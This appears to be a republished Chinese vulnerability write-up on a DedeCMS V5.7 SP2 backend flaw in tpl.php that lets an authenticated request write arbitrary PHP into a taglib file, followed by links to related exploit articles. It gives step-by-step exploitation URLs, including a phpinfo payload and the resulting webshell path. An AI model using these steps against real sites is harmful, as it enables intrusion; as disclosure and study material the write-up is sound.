php中%3c w() %3e,DedeCMS V5.7 SP2后台存在代码执行漏洞
原标题:DedeCMS V5.7 SP2后台存在代码执行漏洞
*本文原创作者:风炫520,本文属FreeBuf原创奖励计划,未经许可禁止转载
简介
织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。
DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。
漏洞详情
织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。
dede/tpl.php中第251行到281行
csrf_check(); if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)) { ShowMsg('文件名不合法,不允许进行操作!', '-1'); exit(); } require_once(DEDEINC.'/oxwindow.class.php'); $tagname = preg_replace("#\.lib\.php$#i", "", $filename); $content = stripslashes($content); $truefile = DEDEINC.'/taglib/'.$filename; $fp = fopen($truefile, 'w'); fwrite($fp, $content); fclose($fp);
1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。
2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。
注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。
漏洞利用
1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值
然后访问
域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值
shell:
域名 + /include/taglib/moonsec.lib.php
漏洞修复
1.禁止此处写入文件。
2.过滤恶意标签参考链接
http://www.cnvd.org.cn/flaw/show/CNVD-2018-01221
*本文原创作者:风炫520,本文属FreeBuf原创奖励计划,未经许可禁止转载返回搜狐,查看更多
责任编辑:
php中%3c w() %3e,DedeCMS V5.7 SP2后台存在代码执行漏洞相关推荐
- DedeCMS V5.7 前台任意用户密码修改漏洞
本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...
- dedecms v5.7 sp2代码执行漏洞复现
环境搭建 DeDeCMS官网:http://www.dedecms.com 网站源码版本:DedeCMS V5.7 SP2正式版 程序源码下载:http://www.dedecms.com/produ ...
- DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
文章目录 简介 漏洞限制 影响版本 复现环境 工具准备 一.搭建网站 二.打开服务器代理 三.复现过程 注意 简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内 最知名 ...
- DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现
DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现 一.漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内最知名的 PHP 开源网站管理系统, ...
- Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
thinkphp-RCE-POC 官方公告: 1.https://blog.thinkphp.cn/869075 2.https://blog.thinkphp.cn/910675 POC: 批量检测 ...
- DedeCMS历史漏洞复现之代码执行漏洞
本文介绍的漏洞虽然不是最新漏洞,但意在让初学者了解漏洞复现的基本流程. 首先了解一下什么是CMS.CMS是Content Management System的缩写,意为"内容管理系统&quo ...
- Dedecms 5.7 SP2后台广告管理处getshell
Dedecms 5.7 SP2后台广告管理处getshell dedecms版本可以到织梦官网下载:http://www.dedecms.com/products/dedecms/downloads/ ...
- 突发,Log4j2 爆出远程代码执行漏洞,各大厂纷纷中招!
今日推荐 这 9 个 Java 开源项目 yyds,你知道几个?阿里技术专家推荐的20本书,免费送!K8S 部署 SpringBoot 项目(一篇够用)妙用Java 8中的 Function接口 消灭 ...
- php excel中解析显示html代码_骑士cms从任意文件包含到远程代码执行漏洞分析
前言 前些日子,骑士cms 官方公布了一个系统紧急风险漏洞升级通知:骑士cms 6.0.48存在一处任意文件包含漏洞,利用该漏洞对payload文件进行包含,即可造成远程代码执行漏洞.这篇文章将从漏洞 ...
最新文章
- discuz 二次开发文章
- 73.关系操作有哪些?
- 浅谈caffe中train_val.prototxt和deploy.prototxt文件的区别
- 《软件测试方法和技术》 读书笔记
- 二叉树,建树,前序,中序,后序,递归 非递归
- 使用gorilla/mux增强Go HTTP服务器的路由能力
- acill排序 java_字符串ASCII码排序
- kvm 网络配置及克隆
- Roboware主题配置教程
- endpt matlab,将SDPT3配置到matlab
- JS逆向之网易云音乐
- Lookup Transformation
- 中国数字乳房断层合成(DBT)设备市场趋势报告、技术动态创新及市场预测
- java 中文大写金额_金额数字转中文大写
- java整型数组转置输出,Java实现数组转置
- 对炒股的一点个人浅见
- 使用bigdecimal来保留小数
- html制作美容热点产品,美容热点产品.html
- c++ 实现计算立方体面积体积 并 判断两个立方体是否相等 (类和对象学习)
- PHP邮件功能无法完成电子邮件的发送